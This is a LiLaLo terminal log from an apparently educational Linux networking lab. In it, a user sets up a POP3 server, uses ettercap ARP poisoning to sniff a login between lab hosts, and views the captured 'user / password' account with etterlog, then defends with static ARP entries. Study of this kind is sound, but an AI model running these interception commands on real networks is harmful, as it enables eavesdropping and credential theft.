[ править ]

Журнал лабораторных работ

Содержание

Журнал

Понедельник (05/25/09)

Файлы
Статистика
Справка
О программе

Журнал

Понедельник (05/25/09)

/dev/ttyp1

10:21:04

#screen

/dev/ttyp3

10:21:12

#sceen -x

bash: sceen: command not found

/dev/ttyp7

10:21:43

#screen -x

/dev/ttyp9

10:21:52

#screen -x

/dev/ttyp5

10:24:51

#. /etc/bash_completion

10:24:58

#apt-get install smbnclient

Чтение списков пакетов... Готово
Построение дерева зависимостей... Готово
E: Не могу найти пакет smbnclient

10:25:50

#smbclient -L 10.0.17.1

        IPC$            IPC       IPC Service (debian server)
        iso             Disk
        2277$           Disk
        incom           Disk
        print$          Disk      Printer Drivers
Domain=[TECH] OS=[Unix] Server=[Samba 3.2.3]
        Server               Comment
        ---------            -------
        DEBIAN               debian server
        TOPAZ
        Workgroup            Master
        ---------            -------
        TECH                 DEBIAN

10:26:16

#ssh 192.168.16.254

  libbonobo2-0 libbonobo2-common libbonoboui2-0 libbonoboui2-common
  libcupsimage2 libcupsys2 libdbus-1-3 libdbus-glib-1-2 libdjvulibre15 libesd0
  libfam0 libgnome2-0 libgnome2-common libgnomecups1.0-1 libgnomeprint2.2-0
  libgnomeprint2.2-data libgnomeprintui2.2-0 libgnomeprintui2.2-common
  libgnomeui-0 libgnomeui-common libgnomevfs2-0 libgnomevfs2-common
  libhal-storage1 libhal1 libkpathsea4 libnautilus-extension1 libpaper1
  libpoppler0c2 libpoppler0c2-glib shared-mime-info
обновлено 0, установлено 41 новых пакетов, для удаления отмечено 0 пакетов, и 63 пакетов не обновлено.
Необходимо скачать 18,6MБ архивов.
После распаковки объем занятого дискового пространства возрастёт на 59,4MB.
...
  esound-common libaudiofile0 libavahi-glib1 libbonobo2-common libbonobo2-0
  libesd0 libfam0 libhal1 libhal-storage1 gnome-mime-data shared-mime-info
  libgnomevfs2-common libgnomevfs2-0 libgnome2-common libgnome2-0
  libbonoboui2-common libbonoboui2-0 libdjvulibre15 libcupsys2
  libgnomecups1.0-1 libgnomeprint2.2-data libgnomeprint2.2-0
  libgnomeprintui2.2-common libgnomeprintui2.2-0 libgnomeui-common
  libgnomeui-0 libkpathsea4 libnautilus-extension1 libpoppler0c2
  libpoppler0c2-glib libcupsimage2 libpaper1 gsfonts gs-common gs-esp evince
E: Существуют проблемы, а опция -y использована без --force-yes
debian:~#

/dev/ttypb

10:34:28

#ssh root@192.168.16.254

Connection to 192.168.16.254 closed.

/dev/ttyp5

10:37:49

bash: 1: command not found

10:38:02

#ifconfig

eth0      Link encap:Ethernet  HWaddr 00:16:3E:00:00:10
          inet addr:192.168.16.10  Bcast:192.168.16.255  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fe00:10/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:70896 errors:0 dropped:0 overruns:0 frame:0
          TX packets:62963 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:58956109 (56.2 MiB)  TX bytes:35831537 (34.1 MiB)
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

прошло 20 минут

10:58:06

#ifconfig -a | less

10:59:07

#ifconfig

eth0      Link encap:Ethernet  HWaddr 00:16:3E:00:00:10
          inet addr:192.168.16.10  Bcast:192.168.16.255  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fe00:10/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:71180 errors:0 dropped:0 overruns:0 frame:0
          TX packets:63282 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:58977760 (56.2 MiB)  TX bytes:35912223 (34.2 MiB)
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

10:59:08

#arp -a

linux4.net.nt (192.168.16.4) at 00:16:3E:00:00:04 [ether] on eth0
linux7.net.nt (192.168.16.7) at 00:16:3E:00:00:07 [ether] on eth0
linux1.net.nt (192.168.16.1) at 00:16:3E:00:00:01 [ether] on eth0
debian.net.nt (192.168.16.254) at 00:04:75:75:46:B1 [ether] on eth0

11:03:50

#arp -an

? (192.168.16.4) at 00:16:3E:00:00:04 [ether] on eth0
? (192.168.16.7) at 00:16:3E:00:00:07 [ether] on eth0
? (192.168.16.1) at 00:16:3E:00:00:01 [ether] on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] on eth0

11:03:57

#ping 192.168.16.2 -c 1

PING 192.168.16.2 (192.168.16.2) 56(84) bytes of data.
64 bytes from 192.168.16.2: icmp_seq=1 ttl=64 time=1.70 ms
--- 192.168.16.2 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.700/1.700/1.700/0.000 ms

11:04:37

#arp -an

? (192.168.16.2) at 00:16:3E:00:00:02 [ether] on eth0
? (192.168.16.4) at 00:16:3E:00:00:04 [ether] on eth0
? (192.168.16.7) at 00:16:3E:00:00:07 [ether] on eth0
? (192.168.16.1) at 00:16:3E:00:00:01 [ether] on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] on eth0

11:05:23

#arp -an

? (192.168.16.2) at 00:16:3E:00:00:02 [ether] on eth0
? (192.168.16.4) at 00:16:3E:00:00:04 [ether] on eth0
? (192.168.16.7) at 00:16:3E:00:00:07 [ether] on eth0
? (192.168.16.1) at 00:16:3E:00:00:01 [ether] on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] on eth0

11:05:29

#arp -an

? (192.168.16.4) at 00:16:3E:00:00:04 [ether] on eth0
? (192.168.16.7) at 00:16:3E:00:00:07 [ether] on eth0
? (192.168.16.1) at 00:16:3E:00:00:01 [ether] on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] on eth0

11:09:21

#ping 192.168.16.3 -c 1

PING 192.168.16.3 (192.168.16.3) 56(84) bytes of data.
64 bytes from 192.168.16.3: icmp_seq=1 ttl=64 time=0.813 ms
--- 192.168.16.3 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.813/0.813/0.813/0.000 ms

11:09:53

#ping 192.168.16.8

[root@debian10:~]# ping 192.168.16.5
PING 192.168.16.5 (192.168.16.5) 56(84) bytes of data.
64 bytes from 192.168.16.5: icmp_seq=1 ttl=64 time=0.876 ms
--- 192.168.16.5 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.876/0.876/0.876/0.000 ms
PING 192.168.16.8 (192.168.16.8) 56(84) bytes of data.
64 bytes from 192.168.16.8: icmp_seq=1 ttl=64 time=1.03 ms
--- 192.168.16.8 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.032/1.032/1.032/0.000 ms

11:09:56

#man arp\

11:15:09

#ssh 192.168.16.3 ' apt-get install -y --force-yes

The authenticity of host '192.168.16.3 (192.168.16.3)' can't be established.
RSA key fingerprint is 51:5b:32:d8:70:19:6d:04:c7:b4:11:49:13:74:dc:bc.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.16.3' (RSA) to the list of known hosts.
root@192.168.16.3's password:
Чтение списков пакетов...
Построение дерева зависимостей...
Рекомендуемые пакеты:
  exim4 mail-transport-agent
НОВЫЕ пакеты, которые будут установлены:
...
debconf: будет использован интерфейс: Teletype
Добавляется группа `popa3d' (GID 104) ...
Готово.
Предупреждение: указанный домашний каталог уже существует.
Добавляется системный пользователь `popa3d' (UID 102) ...
Добавляется новый пользователь `popa3d' (UID 102) в группу `popa3d' ...
adduser: Предупреждение: данный домашний каталог не принадлежит пользователю, который сейчас создаётся.
Домашний каталог `/var/lib/popa3d' уже существует. Не копируется из `/etc/skel'.
Starting pop daemon: popa3d.
\

11:16:33

11:16:34

#telnet

telnet> quit

11:16:40

#telnet 192.168.16.3 111

Trying 192.168.16.3...
telnet: Unable to connect to remote host: Connection refused

11:16:46

#ssh 192.168.16.3

root@192.168.16.3's password:
Last login: Mon May 25 11:07:39 2009 from 192.168.7.229
Linux debiant 2.6.18-5-xen-686 #1 SMP Fri Jun 1 05:05:24 UTC 2007 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
l3-agent is already running: pid=2185; pidfile=/root/.lilalo/l3-agent.pid

11:16:54

#apt-get install popa3d

Чтение списков пакетов... Готово
Построение дерева зависимостей... Готово
Уже установлена самая новая версия popa3d.
обновлено 0, установлено 0 новых пакетов, для удаления отмечено 0 пакетов, и 63 пакетов не обновлено.

11:17:01

#/etc/init.d/popa3d restart

Stopping pop daemon: popa3d.
Starting pop daemon: /usr/sbin/popa3d already running.
popa3d.

11:17:07

#netstat -lnp | grep :110

11:17:20

#/etc/init.d/popa3d restart

Stopping pop daemon: No popa3d found running; none killed.
popa3d.
Starting pop daemon: popa3d.

11:17:27

#/etc/init.d/popa3d restart

Stopping pop daemon: No popa3d found running; none killed.
popa3d.
Starting pop daemon: /usr/sbin/popa3d already running.
popa3d.

11:17:29

#/etc/init.d/popa3d restart

Stopping pop daemon: No popa3d found running; none killed.
popa3d.
Starting pop daemon: /usr/sbin/popa3d already running.
popa3d.

11:17:31

#dpkg-reconfigure popa3d

 ┌──────────────────────────────────┤ Настраивается пакет popa3d ├──────────────────────────────────┐
 │                                                                                                  │
 │ В отдельном режиме popa3d представляет собой демон, принимающий соединения на порту pop3         │
 │ (110/tcp) и создающий дочерние процессы для их обработки. Это менее накладно, чем запуск popa3d  │
 │ из клона inetd, и лучше для загруженных серверов. См. подробности в странице руководства         │
 │ popa3d(8).                                                                                       │
 │                                                                                                  │
 │ Запустить popa3d в отдельном режиме?                                                             │
 │                                                                                                  │
 │                            <Да>                                <Нет>                             │
 │                                                                                                  │
 └──────────────────────────────────────────────────────────────────────────────────────────────────┘
Starting pop daemon: /usr/sbin/popa3d already running.
popa3d.

11:17:48

#exit

exit
Connection to 192.168.16.3 closed.

11:17:50

#telnet 192.168.16.3 111

Trying 192.168.16.3...
telnet: Unable to connect to remote host: Connection refused

11:18:37

#ssh 192.168.16.2

The authenticity of host '192.168.16.2 (192.168.16.2)' can't be established.
RSA key fingerprint is 51:5b:32:d8:70:19:6d:04:c7:b4:11:49:13:74:dc:bc.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.16.2' (RSA) to the list of known hosts.
root@192.168.16.2's password:
Last login: Sun May 24 13:24:59 2009 from 192.168.16.254
Linux debiant 2.6.18-5-xen-686 #1 SMP Fri Jun 1 05:05:24 UTC 2007 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

11:19:02

#apt-cache search ettercap

ettercap - Multipurpose sniffer/interceptor/logger for switched LAN
ettercap-common - Common support files and plugins for ettercap
ettercap-gtk - Multipurpose sniffer/interceptor/logger for switched LAN

11:19:14

#apt-get install ettercap

Чтение списков пакетов... Готово
Построение дерева зависимостей... Готово
Будут установлены следующие дополнительные пакеты:
ettercap-common libltdl3 libnet1 libpcap0.8 libpcre3
НОВЫЕ пакеты, которые будут установлены:
ettercap ettercap-common libltdl3 libnet1 libpcap0.8 libpcre3
обновлено 0, установлено 6 новых пакетов, для удаления отмечено 0 пакетов, и 63 пакетов не обновлено.
Необходимо скачать 1007kБ архивов.
После распаковки объем занятого дискового пространства возрастёт на 2523kB.
Хотите продолжить [Д/н]? Y
...
Выбор ранее не выбранного пакета ettercap-common.
Распаковывается пакет ettercap-common (из файла .../ettercap-common_1%3a0.7.3-1.2_i386.deb)...
Выбор ранее не выбранного пакета ettercap.
Распаковывается пакет ettercap (из файла .../ettercap_1%3a0.7.3-1.2_i386.deb)...
Настраивается пакет libpcre3 (6.7+7.4-4) ...
Настраивается пакет libltdl3 (1.5.22-4) ...
Настраивается пакет libnet1 (1.1.2.1-2) ...
Настраивается пакет libpcap0.8 (0.9.5-1) ...
Настраивается пакет ettercap-common (0.7.3-1.2) ...
Настраивается пакет ettercap (0.7.3-1.2) ...

11:19:42

#etter

ettercap     etterfilter  etterlog

11:19:42

#etter

ettercap     etterfilter  etterlog

11:19:42

#ettercap -T -M arp -L log /192.168.16.1

Mon May 25 11:22:52 2009
TCP  192.168.16.3:110 --> 192.168.16.1:57645 | SA
Mon May 25 11:22:52 2009
TCP  192.168.16.1:57645 --> 192.168.16.3:110 | A
Mon May 25 11:22:52 2009
TCP  192.168.16.3:110 --> 192.168.16.1:57645 | AP
+OK.
Mon May 25 11:22:52 2009
TCP  192.168.16.3:110 --> 192.168.16.1:57645 | AP
+OK.
...
Mon May 25 11:23:30 2009
TCP  192.168.16.1:57645 --> 192.168.16.3:110 | AP
USER user.
Mon May 25 11:23:44 2009
TCP  192.168.16.1:57645 --> 192.168.16.3:110 | AP
USER user.
Mon May 25 11:23:44 2009
TCP  192.168.16.3:110 --> 192.168.16.1:57645 | AP
+OK.
User requested a CTRL+C... (deprecated, next time use proper shutdown)

/dev/ttypb

11:20:56

#ssh 192.168.16.1

The authenticity of host '192.168.16.1 (192.168.16.1)' can't be established.
RSA key fingerprint is 51:5b:32:d8:70:19:6d:04:c7:b4:11:49:13:74:dc:bc.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.16.1' (RSA) to the list of known hosts.
root@192.168.16.1's password:
Last login: Sun May 24 13:29:40 2009 from debian.net.nt
Linux debian1 2.6.18-5-xen-686 #1 SMP Fri Jun 1 05:05:24 UTC 2007 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
l3-agent is already running: pid=1273; pidfile=/root/.lilalo/l3-agent.pid

11:21:08

#arp -an

? (192.168.16.3) at 00:16:3E:00:00:02 [ether] on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] on eth0
? (192.168.16.2) at 00:16:3E:00:00:02 [ether] on eth0
? (192.168.16.10) at 00:16:3E:00:00:10 [ether] on eth0

11:21:11

#tcpd

tcpd       tcpdchk    tcpdmatch

11:21:11

#tcpdump -i eth0 -n arp

bash: tcpdump: command not found

11:21:44

#apt-gert install tcpdump

bash: apt-gert: command not found

11:21:53

#apt-ge

Чтение списков пакетов... Готово
Построение дерева зависимостей... Готово
Будут установлены следующие дополнительные пакеты:
libpcap0.8
НОВЫЕ пакеты, которые будут установлены:
libpcap0.8 tcpdump
обновлено 0, установлено 2 новых пакетов, для удаления отмечено 0 пакетов, и 2 пакетов не обновлено.
Необходимо скачать 392kБ архивов.
После распаковки объем занятого дискового пространства возрастёт на 877kB.
Хотите продолжить [Д/н]? Y
Получено:1 http://debian.org.ua etch/main libpcap0.8 0.9.5-1 [89,5kB]
Получено:2 http://debian.org.ua etch/main tcpdump 3.9.5-2etch1 [303kB]
Получено 392kB за 0s (6398kB/c)
Выбор ранее не выбранного пакета libpcap0.8.
(Чтение базы данных... на данный момент установлено 24657 файлов и каталогов.)
Распаковывается пакет libpcap0.8 (из файла .../libpcap0.8_0.9.5-1_i386.deb)...
Выбор ранее не выбранного пакета tcpdump.
Распаковывается пакет tcpdump (из файла .../tcpdump_3.9.5-2etch1_i386.deb)...
Настраивается пакет libpcap0.8 (0.9.5-1) ...
Настраивается пакет tcpdump (3.9.5-2etch1) ...

11:22:30

#arp -an

[root@debian1:~]# tcpdump -i eth0 -n arp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
11:22:03.461148 arp reply 192.168.16.3 is-at 00:16:3e:00:00:02
11:22:13.473732 arp reply 192.168.16.3 is-at 00:16:3e:00:00:02
11:22:23.486364 arp reply 192.168.16.3 is-at 00:16:3e:00:00:02
3 packets captured
3 packets received by filter
0 packets dropped by kernel
? (192.168.16.3) at 00:16:3E:00:00:02 [ether] on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] on eth0
? (192.168.16.10) at 00:16:3E:00:00:10 [ether] on eth0

11:22:33

#telnet 192.168.16.3 110

Trying 192.168.16.3...
Connected to 192.168.16.3.
Escape character is '^]'.
USER user
PASS password
LIST
^]
telnet> q
Connection closed.

11:23:31

#arp -an | awk '{print$4" " $2}' | tr -d '(,)' > /etc/ethers

/dev/ttyp5

11:23:53

#etterlog log.ec

log.eci  log.ecp

11:23:53

#etterlog log.ec

log.eci  log.ecp

11:23:53

#etterlog log.eci

etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Log file version    : NG-0.7.3
Timestamp           : Mon May 25 11:20:37 2009
Type                : LOG_INFO
1698 tcp OS fingerprint
7587 mac vendor fingerprint
2183 known services
==================================================
 IP address   : 192.168.16.1
 MAC address  : 00:16:3E:00:00:01
...
 IP address   : 192.168.16.3
 MAC address  : 00:16:3E:00:00:02
 MANUFACTURER :
 DISTANCE     : 0
 TYPE         : LAN host
 FINGERPRINT      :
 OPERATING SYSTEM : UNKNOWN
   PORT     : TCP 110 | pop-3   []
      ACCOUNT : user / password  (192.168.16.1)
==================================================

11:24:11

#etterlog log.eci | less

11:24:38

#apt-get install ettercap

11:27:59

#arp -an

? (192.168.16.3) at 00:16:3E:00:00:03 [ether] on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] on eth0
? (192.168.16.1) at 00:16:3E:00:00:01 [ether] on eth0
? (192.168.16.10) at 00:16:3E:00:00:10 [ether] on eth0

11:28:04

#man ethers

11:28:13

#arp -an

? (192.168.16.3) at 00:16:3E:00:00:03 [ether] on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] on eth0
? (192.168.16.1) at 00:16:3E:00:00:01 [ether] on eth0
? (192.168.16.10) at 00:16:3E:00:00:10 [ether] on eth0

11:28:15

#arp -an | awk '{$4

11:28:28

#arp -an | awk '{print

00:16:3E:00:00:03
00:04:75:75:46:B1
00:16:3E:00:00:01
00:16:3E:00:00:10

11:28:33

#arp -an | awk '{print$4 $2

00:16:3E:00:00:03(192.168.16.3)
00:04:75:75:46:B1(192.168.16.254)
00:16:3E:00:00:01(192.168.16.1)
00:16:3E:00:00:10(192.168.16.10)

11:28:48

#arp -an | awk '{print$4" "

00:16:3E:00:00:03 (192.168.16.3)
00:04:75:75:46:B1 (192.168.16.254)
00:16:3E:00:00:01 (192.168.16.1)
00:16:3E:00:00:10 (192.168.16.10)

11:28:52

#arp -an | awk '{print$4" " $2}' | tr -d '(,)'

00:16:3E:00:00:03 192.168.16.3
00:04:75:75:46:B1 192.168.16.254
00:16:3E:00:00:01 192.168.16.1
00:16:3E:00:00:10 192.168.16.10

11:29:12

#arp -an | awk '{print$4" " $2}' | tr -d '(,)' > /etc/ethers

11:29:37

#arp -f /etc/ethers

11:29:42

#arp -an

? (192.168.16.3) at 00:16:3E:00:00:03 [ether] PERM on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] PERM on eth0
? (192.168.16.10) at 00:16:3E:00:00:10 [ether] PERM on eth0

11:29:46

#arp -an

? (192.168.16.3) at 00:16:3E:00:00:03 [ether] PERM on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] PERM on eth0
? (192.168.16.10) at 00:16:3E:00:00:10 [ether] PERM on eth0

11:29:50

#ping 192.168.16.4

PING 192.168.16.4 (192.168.16.4) 56(84) bytes of data.
64 bytes from 192.168.16.4: icmp_seq=1 ttl=64 time=0.899 ms
--- 192.168.16.4 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.899/0.899/0.899/0.000 ms

11:29:59

#arp -an

? (192.168.16.3) at 00:16:3E:00:00:03 [ether] PERM on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] PERM on eth0
? (192.168.16.4) at 00:16:3E:00:00:04 [ether] on eth0
? (192.168.16.10) at 00:16:3E:00:00:10 [ether] PERM on eth0

11:30:01

#man arp

11:30:34

#arp -an

? (192.168.16.3) at 00:16:3E:00:00:03 [ether] PERM on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] PERM on eth0
? (192.168.16.4) at 00:16:3E:00:00:04 [ether] on eth0
? (192.168.16.10) at 00:16:3E:00:00:10 [ether] PERM on eth0

11:30:36

#arp -an

? (192.168.16.3) at 00:16:3E:00:00:03 [ether] PERM on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] PERM on eth0
? (192.168.16.4) at 00:16:3E:00:00:04 [ether] on eth0
? (192.168.16.10) at 00:16:3E:00:00:10 [ether] PERM on eth0

11:30:59

#arp -an | awk '{print$4" " $2}' | tr -d '(,)' > /etc/ethers

/dev/ttypb

11:31:40

#arp -an | awk '{print$4" " $2}' | tr -d '(,)' > /etc/ethers

[root@debian1:~]# ping 192.168.16.3
PING 192.168.16.3 (192.168.16.3) 56(84) bytes of data.
64 bytes from 192.168.16.3: icmp_seq=1 ttl=64 time=1.06 ms
--- 192.168.16.3 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.065/1.065/1.065/0.000 ms

11:31:43

#arp -f /etc/ethers

11:31:49

#arp -an

? (192.168.16.3) at 00:16:3E:00:00:03 [ether] PERM on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] PERM on eth0
? (192.168.16.10) at 00:16:3E:00:00:10 [ether] PERM on eth0

11:31:51

#arp -an

? (192.168.16.2) at 00:16:3E:00:00:02 [ether] on eth0
? (192.168.16.3) at 00:16:3E:00:00:03 [ether] PERM on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] PERM on eth0
? (192.168.16.10) at 00:16:3E:00:00:10 [ether] PERM on eth0

11:32:24

#man arp

11:33:17

#man arp

11:34:24

#arp -an

? (192.168.16.3) at 00:16:3E:00:00:03 [ether] PERM on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] PERM on eth0
? (192.168.16.10) at 00:16:3E:00:00:10 [ether] PERM on eth0

11:34:25

#arp -an

? (192.168.16.3) at 00:16:3E:00:00:03 [ether] PERM on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] PERM on eth0
? (192.168.16.10) at 00:16:3E:00:00:10 [ether] PERM on eth0

11:34:33

#arp -an

? (192.168.16.3) at 00:16:3E:00:00:03 [ether] PERM on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] PERM on eth0
? (192.168.16.10) at 00:16:3E:00:00:10 [ether] PERM on eth0

/dev/ttyp5

11:34:49

#arp -an

[root@debian2:~]# ettercap -T -M arp -L log /192.168.16.1/ /192.168.16.3/
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on eth0... (Ethernet)
  eth0 ->       00:16:3E:00:00:02      192.168.16.2     255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
...
ARP poisoning victims:
 GROUP 1 : 192.168.16.1 00:16:3E:00:00:01
 GROUP 2 : 192.168.16.3 00:16:3E:00:00:03
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
User requested a CTRL+C... (deprecated, next time use proper shutdown)
? (192.168.16.3) at 00:16:3E:00:00:03 [ether] PERM on eth0
? (192.168.16.254) at 00:04:75:75:46:B1 [ether] PERM on eth0
? (192.168.16.10) at 00:16:3E:00:00:10 [ether] PERM on eth0

/dev/ttypb

11:35:02

#watch

11:36:06

#telnet 192.168.16.3 110

[root@debian1:~]# watch arp -an
Trying 192.168.16.3...
Connected to 192.168.16.3.
Escape character is '^]'.
USER user
PASS password
QUIT
^]
telnet> q
Connection closed.

11:36:49

#watch arp -an

/dev/ttyp5

11:37:54

#arp -a

[root@debian2:~]# ettercap -T -M arp -L log /192.168.16.1/ /192.168.16.3/
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on eth0... (Ethernet)
  eth0 ->       00:16:3E:00:00:02      192.168.16.2     255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
...
TCP  192.168.16.3:110 --> 192.168.16.1:47052 | AP
+OK.
Mon May 25 11:37:28 2009
TCP  192.168.16.3:110 --> 192.168.16.1:47052 | AP
+OK.
User requested a CTRL+C... (deprecated, next time use proper shutdown)
linux3.net.nt (192.168.16.3) at 00:16:3E:00:00:03 [ether] PERM on eth0
debian.net.nt (192.168.16.254) at 00:04:75:75:46:B1 [ether] PERM on eth0
linux1.net.nt (192.168.16.1) at 00:16:3E:00:00:01 [ether] on eth0
debian10.net.nt (192.168.16.10) at 00:16:3E:00:00:10 [ether] PERM on eth0

11:38:04

#ettercap -T -M arp -L log /192.168.16.1/ /192.168.16.3/-

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
FATAL: Invalid range !!
Invalid port range

/dev/ttypb

11:41:00

#watch arp -an

11:41:08

#ofciofnfig

bash: ofciofnfig: command not found

11:41:58

#ofciofnf

11:42:00

#ifconfig

eth0      Link encap:Ethernet  HWaddr 00:16:3E:00:00:01
          inet addr:192.168.16.1  Bcast:192.168.16.255  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fe00:1/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:100751 errors:0 dropped:0 overruns:0 frame:0
          TX packets:90040 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:96980608 (92.4 MiB)  TX bytes:29109293 (27.7 MiB)
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

11:42:02

#ifconfig eth1

eth1      Link encap:Ethernet  HWaddr 00:16:3E:00:01:01
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

11:42:12

#ifconfig eth1 hw ether 00:17

11:43:14

#ifconfig eth1

eth1      Link encap:Ethernet  HWaddr 00:17:3E:00:01:01
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

11:43:16

#man mactab

11:43:50

#man nameif

11:44:24

#ssh root@192.168.16.254

Connection to 192.168.16.254 closed.

11:45:22

#ifconfig -a | less

Статистика

Время первой команды журнала 10:21:04 2009- 5-25

Время последней команды журнала 11:45:22 2009- 5-25

Количество командных строк в журнале 100

Процент команд с ненулевым кодом завершения, % 10.00

Процент синтаксически неверно набранных команд, % 6.00

Суммарное время работы с терминалом ^*, час 1.41

Количество командных строк в единицу времени, команда/мин 1.19

Частота использования команд

`arp`	32	\|==========================\| 26.23%
`awk`	9	\|=======\| 7.38%
`ifconfig`	8	\|======\| 6.56%
`man`	7	\|=====\| 5.74%
`ssh`	7	\|=====\| 5.74%
`telnet`	5	\|====\| 4.10%
`tr`	5	\|====\| 4.10%
`etterlog`	4	\|===\| 3.28%
`/etc/ethers`	4	\|===\| 3.28%
`apt-get`	4	\|===\| 3.28%
`ping`	4	\|===\| 3.28%
`/etc/init.d/popa3d`	4	\|===\| 3.28%
`screen`	3	\|==\| 2.46%
`watch`	3	\|==\| 2.46%
`less`	3	\|==\| 2.46%
`etter`	2	\|=\| 1.64%
`ettercap`	2	\|=\| 1.64%
`dpkg-reconfigure`	1	\|\| 0.82%
`.`	1	\|\| 0.82%
`netstat`	1	\|\| 0.82%
`tcpd`	1	\|\| 0.82%
`ofciofnfig`	1	\|\| 0.82%
`\`	1	\|\| 0.82%
`apt-ge`	1	\|\| 0.82%
`ofciofnf`	1	\|\| 0.82%
`tcpdump`	1	\|\| 0.82%
`smbclient`	1	\|\| 0.82%
`sceen`	1	\|\| 0.82%
`apt-gert`	1	\|\| 0.82%
`1`	1	\|\| 0.82%
`grep`	1	\|\| 0.82%
`exit`	1	\|\| 0.82%
`apt-cache`	1	\|\| 0.82%

____
*) Интервалы неактивности длительностью 30 минут и более не учитываются

Справка

Для того чтобы использовать LiLaLo, не нужно знать ничего особенного: всё происходит само собой. Однако, чтобы ведение и последующее использование журналов было как можно более эффективным, желательно иметь в виду следующее:

В журнал автоматически попадают все команды, данные в любом терминале системы.
